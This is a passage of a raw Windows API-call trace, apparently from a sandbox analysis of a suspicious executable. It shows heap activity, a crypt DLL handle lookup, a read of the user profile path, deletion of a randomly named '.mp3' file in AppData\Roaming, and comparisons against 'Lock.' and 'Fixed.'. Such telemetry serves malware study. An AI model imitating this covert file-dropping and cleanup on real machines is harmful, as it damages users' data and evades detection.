hHeap=0x970000) returned 1 [0222.738] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0222.738] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0222.738] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0222.738] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0222.738] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0222.738] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0222.738] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0222.738] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0222.738] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0222.738] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0222.739] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0222.739] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0222.739] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0222.739] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0222.739] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ea8 | out: hHeap=0x970000) returned 1 [0222.739] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0222.739] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f468 | out: hHeap=0x970000) returned 1 [0222.739] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0222.739] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0222.739] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0222.739] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0222.739] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0222.739] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e564e0 | out: hHeap=0x970000) returned 1 [0222.739] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0222.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0222.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0222.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0222.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f041c0 [0222.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0222.739] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0222.739] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f041c0 | out: hHeap=0x970000) returned 1 [0222.739] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0222.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50ea8 [0222.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78bb8 [0222.739] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0222.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0222.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0222.739] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0222.739] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0222.740] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78bb8 | out: hHeap=0x970000) returned 1 [0222.740] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ea8 | out: hHeap=0x970000) returned 1 [0222.740] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0222.740] FreeLibrary (hLibModule=0x756e0000) returned 1 [0222.740] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0222.740] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0222.740] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0222.740] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77588 | out: hHeap=0x970000) returned 1 [0222.740] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0222.740] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0222.740] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0222.740] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0222.740] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0222.740] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0222.740] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0222.740] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0222.740] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0222.740] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0222.740] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0222.740] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0222.740] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0222.740] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50de8 [0222.740] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50ef0 [0222.740] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50f68 [0222.740] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0222.740] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50d28 [0222.740] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f710 [0222.740] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0222.740] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e18 [0222.740] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0222.741] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0222.741] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0222.741] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0222.741] CloseHandle (hObject=0x2a0) returned 1 [0222.741] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0222.741] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0222.741] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04810 | out: hHeap=0x970000) returned 1 [0222.782] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0222.783] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b68 | out: hHeap=0x970000) returned 1 [0222.783] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0222.783] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0222.783] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0222.783] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0222.783] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0222.783] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0222.783] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0222.783] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0222.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0222.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0222.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0222.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0222.783] CloseHandle (hObject=0x2d0) returned 1 [0222.787] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0222.787] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0222.787] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0222.787] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0222.787] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0222.790] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0222.790] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50470 [0222.790] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50620 [0222.790] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0222.790] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf560, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0222.790] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504e8 [0222.790] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0222.790] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0222.790] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0222.790] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0222.790] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50428 [0222.790] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x90) returned 0x2e58910 [0222.790] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/6KDjX0CerhkJtgMw88.mp3", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Roaming\\6KDjX0CerhkJtgMw88.mp3", lpFilePart=0x8cedf4*="6KDjX0CerhkJtgMw88.mp3") returned 0x36 [0222.790] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\6KDjX0CerhkJtgMw88.mp3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\6kdjx0cerhkjtgmw88.mp3")) returned 0x20 [0222.791] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\6KDjX0CerhkJtgMw88.mp3", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd10fad70, ftCreationTime.dwHighDateTime=0x1d5e3e1, ftLastAccessTime.dwLowDateTime=0xe84d9660, ftLastAccessTime.dwHighDateTime=0x1d5ec2d, ftLastWriteTime.dwLowDateTime=0xe84d9660, ftLastWriteTime.dwHighDateTime=0x1d5ec2d, nFileSizeHigh=0x0, nFileSizeLow=0x8343, dwReserved0=0x1, dwReserved1=0x1c, cFileName="6KDjX0CerhkJtgMw88.mp3", cAlternateFileName="6KDJX0~1.MP3")) returned 0xa87410 [0222.791] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\6KDjX0CerhkJtgMw88.mp3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\6kdjx0cerhkjtgmw88.mp3")) returned 1 [0222.837] FindNextFileW (in: hFindFile=0xa87410, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd10fad70, ftCreationTime.dwHighDateTime=0x1d5e3e1, ftLastAccessTime.dwLowDateTime=0xe84d9660, ftLastAccessTime.dwHighDateTime=0x1d5ec2d, ftLastWriteTime.dwLowDateTime=0xe84d9660, ftLastWriteTime.dwHighDateTime=0x1d5ec2d, nFileSizeHigh=0x0, nFileSizeLow=0x8343, dwReserved0=0x1, dwReserved1=0x1c, cFileName="6KDjX0CerhkJtgMw88.mp3", cAlternateFileName="6KDJX0~1.MP3")) returned 0 [0222.838] FindClose (in: hFindFile=0xa87410 | out: hFindFile=0xa87410) returned 1 [0222.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0222.839] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0222.839] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504e8 | out: hHeap=0x970000) returned 1 [0222.839] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50620 | out: hHeap=0x970000) returned 1 [0222.839] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50470 | out: hHeap=0x970000) returned 1 [0222.839] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0222.839] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0222.839] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505d8 [0222.839] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0222.839] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf560, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0222.839] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50500 [0222.839] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0222.839] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c78 [0222.840] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0222.840] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0222.840] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50428 [0222.840] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x90) returned 0x2e58910 [0222.840] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0222.840] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50428 | out: hHeap=0x970000) returned 1 [0222.840] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0222.840] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0222.840] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0222.840] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0222.840] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0222.840] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0222.840] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0222.840] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0222.840] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0222.840] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0222.840] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x6e) returned 0x3be0dd0 [0222.840] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/6KDjX0CerhkJtgMw88.mp3", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Roaming\\6KDjX0CerhkJtgMw88.mp3", lpFilePart=0x8cf650*="6KDjX0CerhkJtgMw88.mp3") returned 0x36 [0222.841] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3be0dd0 | out: hHeap=0x970000) returned 1 [0222.841] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\6KDjX0CerhkJtgMw88.mp3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\6kdjx0cerhkjtgmw88.mp3")) returned 0xffffffff [0222.841] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0222.841] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0222.841] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50500 | out: hHeap=0x970000) returned 1 [0222.841] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505d8 | out: hHeap=0x970000) returned 1 [0222.841] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0222.841] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0222.841] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0222.841] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77788 | out: hHeap=0x970000) returned 1 [0222.841] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0222.841] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0222.841] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0222.841] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0222.841] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50428 [0222.841] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505d8 [0222.841] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0222.842] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0222.842] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0222.842] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0222.842] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0222.842] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504e8 [0222.842] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0222.842] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50668 [0222.842] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0222.842] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="af0Z-.flv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0222.842] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f0Z-.flv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0222.842] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0Z-.flv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0222.842] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Z-.flv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0222.842] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-.flv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0222.842] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0222.842] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505d8 | out: hHeap=0x970000) returned 1 [0222.842] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50668 | out: hHeap=0x970000) returned 1 [0222.842] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504e8 | out: hHeap=0x970000) returned 1 [0222.842] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50428 | out: hHeap=0x970000) returned 1 [0222.843] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0222.843] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0222.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0222.843] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0222.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0222.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504e8 [0222.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0222.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0222.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0222.843] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0222.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50668 [0222.843] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0222.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50488 [0222.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0222.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0222.843] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0222.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50500 [0222.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0222.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503e0 [0222.843] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0222.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0222.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b28 [0222.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b68 [0222.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0222.844] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="af0Z-.flv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0222.844] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f0Z-.flv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0222.844] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0Z-.flv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0222.844] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Z-.flv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0222.844] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0222.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0222.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50470 [0222.844] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0222.844] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0222.844] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50668 | out: hHeap=0x970000) returned 1 [0222.844] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0222.844] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0222.844] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50488 | out: hHeap=0x970000) returned 1 [0222.844] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503e0 | out: hHeap=0x970000) returned 1 [0222.844] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50500 | out: hHeap=0x970000) returned 1 [0222.844] HeapFree (in: 